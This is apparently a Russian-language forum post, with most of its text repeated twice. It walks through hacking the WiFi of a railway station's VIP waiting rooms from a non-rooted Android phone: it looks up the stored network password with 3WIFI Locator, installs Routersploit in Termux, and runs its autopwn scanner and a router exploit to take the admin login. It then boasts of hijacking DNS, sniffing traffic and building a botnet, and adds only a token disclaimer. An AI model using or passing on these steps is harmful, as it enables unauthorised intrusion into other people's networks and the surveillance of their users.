- Автор темы
- #1
Приветствую всех, сегодня рассмотрим один из видов атак на WiFi при помощи android без root прав.
Хочу сказать, что я использую комплексный подход в аудите, так как не придумали еще одной единственной кнопки взлома.
Для сего мироприятия мы будем использовать несколько приложений:
1. 3WIFI Locator
Скачать его можем просто прогуглив (не буду рекламировать).
Единственное что нужно будет - задонатить создателю небольшую, символическую сумму для получения ключа (но поверте, оно того стоит и полностью себя окупает).
2. Net Analyzer или Fing
Скачиваем их из плеймаркета.
3. Termux
Также качаем из плеймаркета.
С приложениями разобрались, шагаем дальше. Сам Termux нам нужно немного подготовить.
Первое что нам понадобится это Termux, устанавливаем в нём Routersploit:
И так, открываем термукс, сначала качаем git и питон:
pkg update
pkg upgrade
pkg install git python
pkg install pip
pip install future
apt install git filget
Теперь сам репозиторий:
git clone https://github.com/threat9/routersploit
Открываем папку с репом, и установим все библиотеки, которые нужны для работы инструмента:
cd routersploit
Запускаем:
python rsf.py
Ну а теперь в бой!)
Перед собой мы видим вот такие сети:
Хочу заметить что территориально это жд вокзал, а сети с именами ZAL1_1 и ZAL2_1 это WiFi в вип залах ожидания.
Сканируем 3WIFILocator-ом:
Ой, оказывается что злые айтишники отключили wps, но из-за того что никто не обновлял маршрутизатор, мы можем увидеть пароль от сети).
Копируем его и залетаем внутрь:
Фактически задача выполнена и мы попали в сеть, но поскольку мы злые школьники, мы хотим доминировать, нам нужна кровь!
Открываем Termux, и наш дивный Routersploit:
cd routersploit
python rsf.py
Далее нам нужно выбрать сканнер и авторежим чтоб не жмакать все рученками:
use scanners/autopwn
Жмакаем Enter:
Теперь нам нужно найти IP нашего роутера, сделаем это на примере Net Analyzer.
Открываем приложение и просто жмакаем кнопочку scan:
IP нашей жертвы 192.168.58.1(у вас этот результат может слегка отличаться), вписываем его в Routersploit командой:
set target 192.168.58.1
Нажимаем Enter и пишем команду:
run
и также жмем Enter:
Процесс сканирования пошел и мы можем увидеть зеленый плюсик, а это значит что нашлась какая-то уязвимость:
Когда сканер завершил свою работу, выдает нам такой результат:
Это значит что конкретный роутер уязвим для такого эксплоита как мы увидели на экране. Чтоб нам его применить мы просто вписываем такую команду:
use и сюда копируем полностью название эксплоита
Жмем Enter и пишем:
run
Жмем Enter
И сразу же посмотрим чего нам неехватает для проведения атаки командой:
show options
Получается вот такое дело:
Видим что нехватает IPадреса жертвы, не вопрос:
set target 192.168.58.1
Жмем Enter
Осталось только проэксплуатировать найденную уязвимость, пишем:
exploit
И жмем Enter
Предположительно мы получили логин "admin" и пароль "7644"
Вводим в браузере 192.168.58.1, и пробуем авторизоваться под данным логином и паролем:
Вуаля, произошел взлом ЖЖЁППЫ.
На самом деле это достаточно серьёзный успех (на маршрутизаторах такого типа удобно заливать прошивки, менять dns, снифать трафик, развивать ботнет и т.д), а тем более учитывая, что мы это сделали с обычного андроида без рут прав.
С практической точки зрения мы получили возможность закрепиться в хоть и изолированной, но все таки частичке критической инфраструктуры и это нам даёт потенциал для дальнейшего развёртывания атаки.
Отдельным абзацем отмечу, что не стоит воспринимать данный метод как 100% ключ к любому wifi или роутеру - это всего лишь один из методов как можно в полевых условиях подступиться к цели. Нет универсального приёма как что нибудь хакнуть. Нужно комбинировать, пробовать и тогда вы достигните успеха.
Если тема будет интересна, возможно выкачу еще несколько простых способов для взлома wifi без заморочек и занудства. Комбинируя которые вы сможете добиться гораздо большего прогресса)
Если же ты дочитал до конца то стоить помнить об ответственности за такие действия, я ни к чему не призываю, а просто описываю работу инструментов.
Хочу сказать, что я использую комплексный подход в аудите, так как не придумали еще одной единственной кнопки взлома.
Для сего мироприятия мы будем использовать несколько приложений:
1. 3WIFI Locator
Скачать его можем просто прогуглив (не буду рекламировать).
Единственное что нужно будет - задонатить создателю небольшую, символическую сумму для получения ключа (но поверте, оно того стоит и полностью себя окупает).
2. Net Analyzer или Fing
Скачиваем их из плеймаркета.
3. Termux
Также качаем из плеймаркета.
С приложениями разобрались, шагаем дальше. Сам Termux нам нужно немного подготовить.
Первое что нам понадобится это Termux, устанавливаем в нём Routersploit:
И так, открываем термукс, сначала качаем git и питон:
pkg update
pkg upgrade
pkg install git python
pkg install pip
pip install future
apt install git filget
Теперь сам репозиторий:
git clone https://github.com/threat9/routersploit
Открываем папку с репом, и установим все библиотеки, которые нужны для работы инструмента:
cd routersploit
Запускаем:
python rsf.py
Ну а теперь в бой!)
Перед собой мы видим вот такие сети:
Хочу заметить что территориально это жд вокзал, а сети с именами ZAL1_1 и ZAL2_1 это WiFi в вип залах ожидания.
Сканируем 3WIFILocator-ом:
Ой, оказывается что злые айтишники отключили wps, но из-за того что никто не обновлял маршрутизатор, мы можем увидеть пароль от сети).
Копируем его и залетаем внутрь:
Фактически задача выполнена и мы попали в сеть, но поскольку мы злые школьники, мы хотим доминировать, нам нужна кровь!
Открываем Termux, и наш дивный Routersploit:
cd routersploit
python rsf.py
Далее нам нужно выбрать сканнер и авторежим чтоб не жмакать все рученками:
use scanners/autopwn
Жмакаем Enter:
Теперь нам нужно найти IP нашего роутера, сделаем это на примере Net Analyzer.
Открываем приложение и просто жмакаем кнопочку scan:
IP нашей жертвы 192.168.58.1(у вас этот результат может слегка отличаться), вписываем его в Routersploit командой:
set target 192.168.58.1
Нажимаем Enter и пишем команду:
run
и также жмем Enter:
Процесс сканирования пошел и мы можем увидеть зеленый плюсик, а это значит что нашлась какая-то уязвимость:
Когда сканер завершил свою работу, выдает нам такой результат:
Это значит что конкретный роутер уязвим для такого эксплоита как мы увидели на экране. Чтоб нам его применить мы просто вписываем такую команду:
use и сюда копируем полностью название эксплоита
Жмем Enter и пишем:
run
Жмем Enter
И сразу же посмотрим чего нам неехватает для проведения атаки командой:
show options
Получается вот такое дело:
Видим что нехватает IPадреса жертвы, не вопрос:
set target 192.168.58.1
Жмем Enter
Осталось только проэксплуатировать найденную уязвимость, пишем:
exploit
И жмем Enter
Предположительно мы получили логин "admin" и пароль "7644"
Вводим в браузере 192.168.58.1, и пробуем авторизоваться под данным логином и паролем:
Вуаля, произошел взлом ЖЖЁППЫ.
На самом деле это достаточно серьёзный успех (на маршрутизаторах такого типа удобно заливать прошивки, менять dns, снифать трафик, развивать ботнет и т.д), а тем более учитывая, что мы это сделали с обычного андроида без рут прав.
С практической точки зрения мы получили возможность закрепиться в хоть и изолированной, но все таки частичке критической инфраструктуры и это нам даёт потенциал для дальнейшего развёртывания атаки.
Отдельным абзацем отмечу, что не стоит воспринимать данный метод как 100% ключ к любому wifi или роутеру - это всего лишь один из методов как можно в полевых условиях подступиться к цели. Нет универсального приёма как что нибудь хакнуть. Нужно комбинировать, пробовать и тогда вы достигните успеха.
Если тема будет интересна, возможно выкачу еще несколько простых способов для взлома wifi без заморочек и занудства. Комбинируя которые вы сможете добиться гораздо большего прогресса)
Если же ты дочитал до конца то стоить помнить об ответственности за такие действия, я ни к чему не призываю, а просто описываю работу инструментов.
- Telegram